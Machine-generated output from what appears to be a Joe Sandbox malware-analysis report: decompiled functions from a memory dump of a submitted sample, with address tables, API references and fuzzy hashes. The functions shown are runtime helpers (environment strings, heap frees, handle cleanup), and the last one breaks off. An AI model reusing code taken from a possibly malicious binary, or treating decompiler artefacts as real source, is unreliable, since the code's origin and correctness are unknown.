                                                    0x00ce2bda
                                                    0x00ce2bdc
                                                    0x00ce2be1
                                                    0x00ce2be6
                                                    0x00ce2be8
                                                    0x00ce2beb
                                                    0x00ce2bf0
                                                    0x00ce2d00
                                                    0x00ce2d00
                                                    0x00ce2d00
                                                    0x00000000
                                                    0x00ce2bff
                                                    0x00ce2bff
                                                    0x00ce2c04
                                                    0x00ce2c0e
                                                    0x00ce2c10
                                                    0x00ce2c15
                                                    0x00ce2c1a
                                                    0x00ce2c1a
                                                    0x00ce2c1c
                                                    0x00ce2c1f
                                                    0x00ce2c24
                                                    0x00ce2c46
                                                    0x00ce2c46
                                                    0x00ce2c49
                                                    0x00ce2c4c
                                                    0x00ce2c6a
                                                    0x00ce2c6d
                                                    0x00ce2cac
                                                    0x00ce2caf
                                                    0x00ce2cb2
                                                    0x00ce2cd7
                                                    0x00ce2cd9
                                                    0x00000000
                                                    0x00ce2cdb
                                                    0x00ce2cdb
                                                    0x00ce2cdd
                                                    0x00000000
                                                    0x00ce2cdf
                                                    0x00ce2cdf
                                                    0x00ce2ce4
                                                    0x00ce2ce8
                                                    0x00ce2ce8
                                                    0x00ce2ce9
                                                    0x00000000
                                                    0x00ce2ce9
                                                    0x00ce2cdd
                                                    0x00ce2cb4
                                                    0x00ce2cb4
                                                    0x00ce2cb6
                                                    0x00000000
                                                    0x00ce2cb8
                                                    0x00ce2cb8
                                                    0x00ce2cba
                                                    0x00000000
                                                    0x00ce2cbc
                                                    0x00ce2ccd
                                                    0x00000000
                                                    0x00ce2cd2
                                                    0x00ce2cba
                                                    0x00ce2cb6
                                                    0x00ce2c6f
                                                    0x00ce2c6f
                                                    0x00ce2c73
                                                    0x00000000
                                                    0x00ce2c79
                                                    0x00ce2c79
                                                    0x00ce2c7b
                                                    0x00000000
                                                    0x00ce2c81
                                                    0x00ce2c88
                                                    0x00ce2c90
                                                    0x00ce2c94
                                                    0x00ce2c96
                                                    0x00ce2c99
                                                    0x00ce2c9e
                                                    0x00ce2c9f
                                                    0x00000000
                                                    0x00ce2c9f
                                                    0x00ce2c99
                                                    0x00000000
                                                    0x00ce2c94
                                                    0x00ce2c7b
                                                    0x00ce2c73
                                                    0x00ce2c4e
                                                    0x00ce2c4e
                                                    0x00000000
                                                    0x00ce2c4e
                                                    0x00ce2c2b
                                                    0x00ce2c2b
                                                    0x00ce2c30
                                                    0x00ce2c35
                                                    0x00000000
                                                    0x00ce2c37
                                                    0x00ce2c39
                                                    0x00ce2c42
                                                    0x00ce2c51
                                                    0x00ce2c53
                                                    0x00ce2d12
                                                    0x00ce2d12
                                                    0x00ce2d17
                                                    0x00ce2d18
                                                    0x00ce2d1a
                                                    0x00ce2d1f
                                                    0x00ce2d24
                                                    0x00ce2d27
                                                    0x00ce2d2a
                                                    0x00ce2d2d
                                                    0x00ce2d36
                                                    0x00ce2d36
                                                    0x00ce2d2f
                                                    0x00ce2d2f
                                                    0x00ce2d2f
                                                    0x00ce2d39
                                                    0x00ce2d3d
                                                    0x00ce2d40
                                                    0x00ce2d41
                                                    0x00ce2d42
                                                    0x00ce2d43
                                                    0x00ce2d46
                                                    0x00ce2d4f
                                                    0x00ce2d4f
                                                    0x00ce2d52
                                                    0x00ce2d88
                                                    0x00ce2d54
                                                    0x00ce2d54
                                                    0x00ce2d54
                                                    0x00ce2d57
                                                    0x00ce2d6e
                                                    0x00ce2d6e
                                                    0x00ce2d57
                                                    0x00ce2d8d
                                                    0x00ce2d97
                                                    0x00ce2da3
                                                    0x00ce2c61
                                                    0x00ce2c61
                                                    0x00ce2c66
                                                    0x00ce2c67
                                                    0x00ce2ca1
                                                    0x00ce2ca8
                                                    0x00ce2cec
                                                    0x00ce2cec
                                                    0x00ce2cf3
                                                    0x00ce2d02
                                                    0x00ce2d05
                                                    0x00ce2d11
                                                    0x00ce2d11
                                                    0x00ce2c53
                                                    0x00ce2c35
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2c04

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer$_abort
                                                    • String ID:
                                                    • API String ID: 2252061734-0
                                                    • Opcode ID: 4c10d58a269b944166c25be6be43505d575ca3e15d219911cac45acdb3a3335c
                                                    • Instruction ID: 295195b47ea4778bb7cecedc7b8f90dbaa315d9ff3c0a9f332f1c8745914a209
                                                    • Opcode Fuzzy Hash: 4c10d58a269b944166c25be6be43505d575ca3e15d219911cac45acdb3a3335c
                                                    • Instruction Fuzzy Hash: 9151F572600296AFEB298F16DC45B7AB7A9FF14310F34412DEE16472A1D771EE80E790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00CEBF30() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00CEBEF9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00CE8E06(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00CE8DCC(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                                    0x00cebf3f
                                                    0x00cebf45
                                                    0x00cebf9d
                                                    0x00cebf9d
                                                    0x00cebf47
                                                    0x00cebf48
                                                    0x00cebf4d
                                                    0x00cebf56
                                                    0x00cebf5c
                                                    0x00cebf62
                                                    0x00cebf67
                                                    0x00000000
                                                    0x00cebf69
                                                    0x00cebf6f
                                                    0x00cebf74
                                                    0x00cebf92
                                                    0x00cebf8c
                                                    0x00cebf8c
                                                    0x00cebf8e
                                                    0x00cebf8e
                                                    0x00cebf95
                                                    0x00cebf9a
                                                    0x00cebf67
                                                    0x00cebfa1
                                                    0x00cebfa4
                                                    0x00cebfa4
                                                    0x00cebfb2

                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00CEBF39
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CEBF5C
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CEBF82
                                                    • _free.LIBCMT ref: 00CEBF95
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CEBFA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                    • Instruction ID: 8c4043415e66c6fa6827c4c67a8fd431d70be9de0a163b5fc7a4104fdde0839d
                                                    • Opcode Fuzzy Hash: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                    • Instruction Fuzzy Hash: 5601F27A6012917F27212AFB5C8DE7F7A6DEEC2BA03254129F908D3200EF60CE01D5B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00CE9869(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t17;
				long _t18;

				_t11 = __ecx;
				_t18 = GetLastError();
				_t10 = 0;
				_t2 =  *0xcfe7fc; // 0x6
				_t21 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t17 = E00CEB136(_t11, 1, 0x364);
					_pop(_t13);
					if(_t17 != 0) {
						_t4 = E00CEAEB1(_t10, _t13, _t17, __eflags,  *0xcfe7fc, _t17);
						__eflags = _t4;
						if(_t4 != 0) {
							E00CE9649(_t13, _t17, 0xd22288);
							E00CE8DCC(_t10);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t17);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00CE8DCC();
						L8:
						SetLastError(_t18);
					}
				} else {
					_t17 = E00CEAE5B(0, _t11, _t16, _t21, _t2);
					if(_t17 != 0) {
						L9:
						SetLastError(_t18);
						_t10 = _t17;
					} else {
						goto L2;
					}
				}
				return _t10;
			}













                                                    0x00ce9869
                                                    0x00ce9874
                                                    0x00ce9876
                                                    0x00ce9878
                                                    0x00ce987d
                                                    0x00ce9880
                                                    0x00ce988e
                                                    0x00ce989a
                                                    0x00ce989d
                                                    0x00ce98a0
                                                    0x00ce98b2
                                                    0x00ce98b7
                                                    0x00ce98b9
                                                    0x00ce98c4
                                                    0x00ce98ca
                                                    0x00ce98d2
                                                    0x00ce98d4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce98bb
                                                    0x00ce98bb
                                                    0x00000000
                                                    0x00ce98bb
                                                    0x00ce98a2
                                                    0x00ce98a2
                                                    0x00ce98a3
                                                    0x00ce98a3
                                                    0x00ce98d6
                                                    0x00ce98d7
                                                    0x00ce98d7
                                                    0x00ce9882
                                                    0x00ce9888
                                                    0x00ce988c
                                                    0x00ce98df
                                                    0x00ce98e0
                                                    0x00ce98e6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce988c
                                                    0x00ce98ed

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00CE91AD,00CEB188,?,00CE9813,00000001,00000364,?,00CE40EF,?,?,00D01098), ref: 00CE986E
                                                    • _free.LIBCMT ref: 00CE98A3
                                                    • _free.LIBCMT ref: 00CE98CA
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE98D7
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE98E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 2fab09bdc86c215ef71c143e5e2893f0ab873067ca5ffa6c946eb3ba86abb443
                                                    • Instruction ID: ac248acbc2ea9a7882ee85b15383301b9dabeb8db4894825fff335374fa8b23f
                                                    • Opcode Fuzzy Hash: 2fab09bdc86c215ef71c143e5e2893f0ab873067ca5ffa6c946eb3ba86abb443
                                                    • Instruction Fuzzy Hash: FD01F4361446C17BC23223676C85B3F252DDFD3774B250136F525921F2EE748E05A166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00CD0EED(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				long* _t20;
				void** _t26;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(0xcf2641);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00CD11CF(__ecx);
				_t20 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t26 = _t28 + 4;
					do {
						E00CD0FE4(_t22, _t30,  *_t26);
						CloseHandle( *_t26);
						_t20 = _t20 + 1;
						_t26 =  &(_t26[1]);
					} while (_t20 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











                                                    0x00cd0eed
                                                    0x00cd0ef6
                                                    0x00cd0ef8
                                                    0x00cd0efd
                                                    0x00cd0efe
                                                    0x00cd0f08
                                                    0x00cd0f0a
                                                    0x00cd0f0f
                                                    0x00cd0f11
                                                    0x00cd0f21
                                                    0x00cd0f2d
                                                    0x00cd0f2f
                                                    0x00cd0f32
                                                    0x00cd0f34
                                                    0x00cd0f3b
                                                    0x00cd0f41
                                                    0x00cd0f42
                                                    0x00cd0f45
                                                    0x00cd0f32
                                                    0x00cd0f54
                                                    0x00cd0f60
                                                    0x00cd0f6c
                                                    0x00cd0f77
                                                    0x00cd0f80

                                                    APIs
                                                      • Part of subcall function 00CD11CF: ResetEvent.KERNEL32(?), ref: 00CD11E1
                                                      • Part of subcall function 00CD11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CD11F5
                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CD0F21
                                                    • CloseHandle.KERNEL32(?,?), ref: 00CD0F3B
                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00CD0F54
                                                    • CloseHandle.KERNEL32(?), ref: 00CD0F60
                                                    • CloseHandle.KERNEL32(?), ref: 00CD0F6C
                                                      • Part of subcall function 00CD0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CD1101,?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FEA
                                                      • Part of subcall function 00CD0FE4: GetLastError.KERNEL32(?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                    • String ID:
                                                    • API String ID: 1868215902-0
                                                    • Opcode ID: 6d67d228531dc42f2efe32586dfc1a921c5d95c9a8e839f9129fb990027efd36
                                                    • Instruction ID: 69bc1a2d8e147d72c3519467edd160327076d1944e786d843cb0dbd43cc5539f
                                                    • Opcode Fuzzy Hash: 6d67d228531dc42f2efe32586dfc1a921c5d95c9a8e839f9129fb990027efd36
                                                    • Instruction Fuzzy Hash: 71015271500744FFC7229B64DC84FDAFBA9FB08710F10092AF26B92160CB757A45DA55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CEC7FF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xcfeea0; // 0xcfee94
					if(_t23 != 0) {
						E00CE8DCC(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xcfeea4; // 0xd226fc
					if(_t24 != 0) {
						E00CE8DCC(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xcfeea8; // 0xd226fc
					if(_t25 != 0) {
						E00CE8DCC(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xcfeed0; // 0xcfee98
					if(_t26 != 0) {
						E00CE8DCC(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xcfeed4; // 0xd22700
					if(_t27 != 0) {
						return E00CE8DCC(_t6);
					}
				}
				return _t6;
			}










                                                    0x00cec805
                                                    0x00cec80a
                                                    0x00cec80e
                                                    0x00cec814
                                                    0x00cec817
                                                    0x00cec81c
                                                    0x00cec820
                                                    0x00cec826
                                                    0x00cec829
                                                    0x00cec82e
                                                    0x00cec832
                                                    0x00cec838
                                                    0x00cec83b
                                                    0x00cec840
                                                    0x00cec844
                                                    0x00cec84a
                                                    0x00cec84d
                                                    0x00cec852
                                                    0x00cec853
                                                    0x00cec856
                                                    0x00cec85c
                                                    0x00000000
                                                    0x00cec864
                                                    0x00cec85c
                                                    0x00cec867

                                                    APIs
                                                    • _free.LIBCMT ref: 00CEC817
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CEC829
                                                    • _free.LIBCMT ref: 00CEC83B
                                                    • _free.LIBCMT ref: 00CEC84D
                                                    • _free.LIBCMT ref: 00CEC85F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                    • Instruction ID: 5c0c0e216d8651f804d26467eebcd25c89a02ebff33d4f783bd9cb9e3c5d9bf7
                                                    • Opcode Fuzzy Hash: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                    • Instruction Fuzzy Hash: 54F09632500291ABC734DB6AF9C5E1B73EABB00B147580819F11CD75A2CF70FE80CA51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CD1FDD(void* __eflags, short* _a4, short* _a8, int _a12) {
				void* _t10;
				int _t22;
				int _t23;

				_t10 = E00CE3E13(_a4);
				_t23 = _a12;
				if(_t10 + 1 >= _t23) {
					_t22 = _t23;
				} else {
					_t4 = E00CE3E13(_a4) + 1; // 0x1
					_t22 = _t4;
				}
				if(E00CE3E13(_a8) + 1 < _t23) {
					_t7 = E00CE3E13(_a8) + 1; // 0x1
					_t23 = _t7;
				}
				return CompareStringW(0x400, 0x1001, _a4, _t22, _a8, _t23) - 2;
			}






                                                    0x00cd1fe5
                                                    0x00cd1fea
                                                    0x00cd1ff1
                                                    0x00cd2001
                                                    0x00cd1ff3
                                                    0x00cd1ffc
                                                    0x00cd1ffc
                                                    0x00cd1ffc
                                                    0x00cd200f
                                                    0x00cd201a
                                                    0x00cd201a
                                                    0x00cd201a
                                                    0x00cd203b

                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CD1FE5
                                                    • _wcslen.LIBCMT ref: 00CD1FF6
                                                    • _wcslen.LIBCMT ref: 00CD2006
                                                    • _wcslen.LIBCMT ref: 00CD2014
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CCB371,?,?,00000000,?,?,?), ref: 00CD202F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CompareString
                                                    • String ID:
                                                    • API String ID: 3397213944-0
                                                    • Opcode ID: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                    • Instruction ID: 3f29670ca517987d33570b52eb38ec9c3ead43cd6d3289fcf1ecf6db1f3aba69
                                                    • Opcode Fuzzy Hash: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                    • Instruction Fuzzy Hash: C7F03033008094BFCF265F52EC09DCE7F26EB54770B118416F61A5B061CB72E661E6D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E00CE8900(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xcfee90; // 0x3392210
					if(_t7 != 0xcfec70) {
						E00CE8DCC(_t7);
						 *0xcfee90 = 0xcfec70;
					}
				}
				E00CE8DCC( *0xd22280);
				 *0xd22280 = 0;
				E00CE8DCC( *0xd22284);
				 *0xd22284 = 0;
				E00CE8DCC( *0xd226d0);
				 *0xd226d0 = 0;
				E00CE8DCC( *0xd226d4);
				 *0xd226d4 = 0;
				return 1;
			}




                                                    0x00ce8909
                                                    0x00ce890d
                                                    0x00ce890f
                                                    0x00ce891b
                                                    0x00ce891e
                                                    0x00ce8924
                                                    0x00ce8924
                                                    0x00ce891b
                                                    0x00ce8930
                                                    0x00ce893d
                                                    0x00ce8943
                                                    0x00ce894e
                                                    0x00ce8954
                                                    0x00ce895f
                                                    0x00ce8965
                                                    0x00ce896d
                                                    0x00ce8976

                                                    APIs
                                                    • _free.LIBCMT ref: 00CE891E
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CE8930
                                                    • _free.LIBCMT ref: 00CE8943
                                                    • _free.LIBCMT ref: 00CE8954
                                                    • _free.LIBCMT ref: 00CE8965
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                    • Instruction ID: 6fe375846a9ec809a7d2ba10b99151e87068a9b93c8fa5f4a5b083538cc18722
                                                    • Opcode Fuzzy Hash: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                    • Instruction Fuzzy Hash: 8AF0DA72810767EB87666F15FC0253D3BA2FB347253050606F518D67B2CB328A46EBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 19%
                                                    			E00CD15FE(intOrPtr* __ecx) {
				char _v516;
				char _v5124;
				signed int _t33;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				void* _t61;
				void* _t62;

				E00CDEC50(0x1400);
				_t57 = __ecx;
				_t33 =  *(__ecx + 0x48);
				_t61 = _t33 - 0x74;
				if(_t61 > 0) {
					__eflags = _t33 - 0x83;
					if(_t33 == 0x83) {
						E00CDD694();
						__eflags =  *(_t57 + 4);
						if( *(_t57 + 4) == 0) {
							E00CD0602( &_v5124, E00CCE617(0xc9), 0xa00);
						} else {
							E00CC4092( &_v5124, 0xa00, E00CCE617(0xca),  *(_t57 + 4));
						}
						return E00CDA7E4( *0xd08450,  &_v5124, E00CCE617(0x96), 0);
					}
				} else {
					if(_t61 == 0) {
